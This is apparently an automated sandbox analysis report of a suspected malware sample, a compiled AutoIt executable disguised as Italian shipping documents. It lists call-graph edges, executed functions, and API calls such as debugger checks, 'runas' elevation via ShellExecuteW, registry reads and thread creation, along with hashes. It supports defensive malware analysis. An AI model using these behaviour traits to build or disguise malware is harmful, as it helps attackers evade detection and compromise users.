410d11 86544->86546 86545 410da9 VirtualProtect 86547 410d77 86545->86547 86546->86545 86546->86547 86547->86495 86547->86496 86548->86509 86549->86509 86550->86481 86551->86499 86552->86500 86555->86514 86556->86480 86559->86518 86560->86520 86561->86525 86562->86527 86563->86543 86564->86113 86565->86032 86566->86082 86567->86144 86568->86082 86569->86082 86570->86052 86571->86078 86572->86044 86573->86048 86574->86053 86575->86108 86576->86108 86577->86108 86578->86066 86579->86034 86580->86071 86581->86101 86582->86122 86583->86122 86584->86113 86585->86127 86586->86140 86587->86133 86588->86138 86589->86147 86590->86147 86591->86034 86592->86038 86593 42d154 86597 480a8d 86593->86597 86595 42d161 86596 480a8d 194 API calls 86595->86596 86596->86595 86598 480ae4 86597->86598 86599 480b26 86597->86599 86601 480aeb 86598->86601 86602 480b15 86598->86602 86600 40bc70 52 API calls 86599->86600 86623 480b2e 86600->86623 86604 480aee 86601->86604 86605 480b04 86601->86605 86630 4805bf 194 API calls 86602->86630 86604->86599 86606 480af3 86604->86606 86629 47fea2 194 API calls __itow_s 86605->86629 86628 47f135 194 API calls 86606->86628 86609 40e0a0 52 API calls 86609->86623 86611 408f40 VariantClear 86613 481156 86611->86613 86612 480aff 86612->86611 86614 408f40 VariantClear 86613->86614 86615 48115e 86614->86615 86615->86595 86616 480ff5 86636 45e737 90 API calls 3 library calls 86616->86636 86617 40e710 53 API calls 86617->86623 86618 401980 53 API calls 86618->86623 86620 40c2c0 52 API calls 86620->86623 86621 408e80 VariantClear 86621->86623 86622 40a780 194 API calls 86622->86623 86623->86609 86623->86612 86623->86616 86623->86617 86623->86618 86623->86620 86623->86621 86623->86622 86631 45377f 52 API calls 86623->86631 86632 45e951 53 API calls 86623->86632 86633 40e830 53 API calls 86623->86633 86634 47925f 53 API calls 86623->86634 86635 47fcff 194 API calls 86623->86635 86628->86612 86629->86612 86630->86612 86631->86623 86632->86623 86633->86623 86634->86623 86635->86623 86636->86612 86637 41713c0 86651 416f010 86637->86651 86639 4171482 86654 41712b0 86639->86654 86657 41724b0 GetPEB 86651->86657 86653 416f69b 86653->86639 86655 41712b9 Sleep 86654->86655 86656 41712c7 86655->86656 86658 41724da 86657->86658 86658->86653 86659 42b14b 86666 40bc10 86659->86666 86661 42b159 86662 4096a0 331 API calls 86661->86662 86663 42b177 86662->86663 86677 44b92d VariantClear 86663->86677 86665 42bc5b 86667 40bc24 86666->86667 86668 40bc17 86666->86668 86670 40bc2a 86667->86670 86671 40bc3c 86667->86671 86669 408e80 VariantClear 86668->86669 86672 40bc1f 86669->86672 86673 408e80 VariantClear 86670->86673 86674 4115d7 52 API calls 86671->86674 86672->86661 86675 40bc33 86673->86675 86676 40bc43 86674->86676 86675->86661 86676->86661 86677->86665 86678 425b2b 86683 40f000 86678->86683 86682 425b3a 86684 4115d7 52 API calls 86683->86684 86685 40f007 86684->86685 86686 4276ea 86685->86686 86692 40f030 86685->86692 86691 41130a 51 API calls __cinit 86691->86682 86693 40f039 86692->86693 86694 40f01a 86692->86694 86722 41130a 51 API calls __cinit 86693->86722 86696 40e500 86694->86696 86697 40bc70 52 API calls 86696->86697 86698 40e515 GetVersionExW 86697->86698 86699 402160 52 API calls 86698->86699 86700 40e557 86699->86700 86723 40e660 86700->86723 86706 427674 86710 4276c6 GetSystemInfo 86706->86710 86708 40e5e0 86712 4276d5 GetSystemInfo 86708->86712 86737 40efd0 86708->86737 86709 40e5cd GetCurrentProcess 86744 40ef20 LoadLibraryA GetProcAddress 86709->86744 86710->86712 86715 40e629 86741 40ef90 86715->86741 86718 40e641 FreeLibrary 86719 40e644 86718->86719 86720 40e653 FreeLibrary 86719->86720 86721 40e656 86719->86721 86720->86721 86721->86691 86722->86694 86724 40e667 86723->86724 86725 42761d 86724->86725 86726 40c600 52 API calls 86724->86726 86727 40e55c 86726->86727 86728 40e680 86727->86728 86729 40e687 86728->86729 86730 427616 86729->86730 86731 40c600 52 API calls 86729->86731 86732 40e566 86731->86732 86732->86706 86733 40ef60 86732->86733 86734 40e5c8 86733->86734 86735 40ef66 LoadLibraryA 86733->86735 86734->86708 86734->86709 86735->86734 86736 40ef77 GetProcAddress 86735->86736 86736->86734 86738 40e620 86737->86738 86739 40efd6 LoadLibraryA 86737->86739 86738->86710 86738->86715 86739->86738 86740 40efe7 GetProcAddress 86739->86740 86740->86738 86745 40efb0 LoadLibraryA GetProcAddress 86741->86745 86743 40e632 GetNativeSystemInfo 86743->86718 86743->86719 86744->86708 86745->86743 86746 425b5e 86751 40c7f0 86746->86751 86750 425b6d 86786 40db10 52 API calls 86751->86786 86753 40c82a 86787 410ab0 6 API calls 86753->86787 86755 40c86d 86756 40bc70 52 API calls 86755->86756 86757 40c877 86756->86757 86758 40bc70 52 API calls 86757->86758 86759 40c881 86758->86759 86760 40bc70 52 API calls 86759->86760 86761 40c88b 86760->86761 86762 40bc70 52 API calls 86761->86762 86763 40c8d1 86762->86763 86764 40bc70 52 API calls 86763->86764 86765 40c991 86764->86765 86788 40d2c0 52 API calls 86765->86788 86767 40c99b 86789 40d0d0 53 API calls 86767->86789 86769 40c9c1 86770 40bc70 52 API calls 86769->86770 86771 40c9cb 86770->86771 86790 40e310 53 API calls 86771->86790 86773 40ca28 86774 408f40 VariantClear 86773->86774 86775 40ca30 86774->86775 86776 408f40 VariantClear 86775->86776 86777 40ca38 GetStdHandle 86776->86777 86778 429630 86777->86778 86779 40ca87 86777->86779 86778->86779 86780 429639 86778->86780 86785 41130a 51 API calls __cinit 86779->86785 86791 4432c0 57 API calls 86780->86791 86782 429641 86792 44b6ab CreateThread 86782->86792 86784 42964f CloseHandle 86784->86779 86785->86750 86786->86753 86787->86755 86788->86767 86789->86769 86790->86773 86791->86782 86792->86784 86793 44b5cb 58 API calls 86792->86793 86794 425b6f 86799 40dc90 86794->86799 86798 425b7e 86800 40bc70 52 API calls 86799->86800 86801 40dd03 86800->86801 86807 40f210 86801->86807 86803 40dd96 86804 40ddb7 86803->86804 86810 40dc00 52 API calls 2 library calls 86803->86810 86806 41130a 51 API calls __cinit 86804->86806 86806->86798 86811 40f250 RegOpenKeyExW 86807->86811 86809 40f230 86809->86803 86810->86803 86812 425e17 86811->86812 86813 40f275 RegQueryValueExW 86811->86813 86812->86809 86814 40f2c3 RegCloseKey 86813->86814 86815 40f298 86813->86815 86814->86809 86816 40f2a9 RegCloseKey 86815->86816 86817 425e1d 86815->86817 86816->86809

                        Executed Functions

                        Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 004096C1
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • _memmove.LIBCMT ref: 0040970C
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                        • _memmove.LIBCMT ref: 00409D96
                        • _memmove.LIBCMT ref: 0040A6C4
                        • _memmove.LIBCMT ref: 004297E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                        • String ID:
                        • API String ID: 2383988440-0
                        • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                        • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                        Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104,?), ref: 00401F4C
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                        • String ID: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                        • API String ID: 2495805114-4167691841
                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                        Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1915 40e585-40e596 1913->1915 1916 40e5ba-40e5cb call 40ef60 1913->1916 1917 427683-427686 1914->1917 1918 42767b-427681 1914->1918 1920 427625-427629 1915->1920 1921 40e59c-40e59f 1915->1921 1935 40e5ec-40e60c 1916->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1916->1936 1922 427693-427696 1917->1922 1923 427688-427691 1917->1923 1919 4276b4-4276be 1918->1919 1937 4276c6-4276ca GetSystemInfo 1919->1937 1929 427636-427640 1920->1929 1930 42762b-427631 1920->1930 1925 40e5a5-40e5ae 1921->1925 1926 427654-427657 1921->1926 1922->1919 1927 427698-4276a8 1922->1927 1923->1919 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1916 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1916 1930->1916 1931->1916 1932->1916 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1916 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                        • String ID: 0SH
                        • API String ID: 3363477735-851180471
                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                        Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: IsThemeActive$uxtheme.dll
                        • API String ID: 2574300362-3542929980
                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                        Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                        • TranslateMessage.USER32(?), ref: 00409556
                        • DispatchMessageW.USER32(?), ref: 00409561
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchSleepTranslate
                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                        • API String ID: 1762048999-758534266
                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                        Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104,?), ref: 00401F4C
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • __wcsicoll.LIBCMT ref: 00402007
                        • __wcsicoll.LIBCMT ref: 0040201D
                        • __wcsicoll.LIBCMT ref: 00402033
                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                        • __wcsicoll.LIBCMT ref: 00402049
                        • _wcscpy.LIBCMT ref: 0040207C
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,00000104), ref: 00428B5B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe$CMDLINE$CMDLINERAW
                        • API String ID: 3948761352-1779450810
                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                        Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __fread_nolock$_fseek_wcscpy
                        • String ID: D)E$D)E$FILE
                        • API String ID: 3888824918-361185794
                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                        Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                        • __wsplitpath.LIBCMT ref: 0040E41C
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • _wcsncat.LIBCMT ref: 0040E433
                        • __wmakepath.LIBCMT ref: 0040E44F
                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • _wcscpy.LIBCMT ref: 0040E487
                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                        • _wcscat.LIBCMT ref: 00427541
                        • _wcslen.LIBCMT ref: 00427551
                        • _wcslen.LIBCMT ref: 00427562
                        • _wcscat.LIBCMT ref: 0042757C
                        • _wcsncpy.LIBCMT ref: 004275BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                        • String ID: Include$\
                        • API String ID: 3173733714-3429789819
                        • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                        • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                        Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • _fseek.LIBCMT ref: 0045292B
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
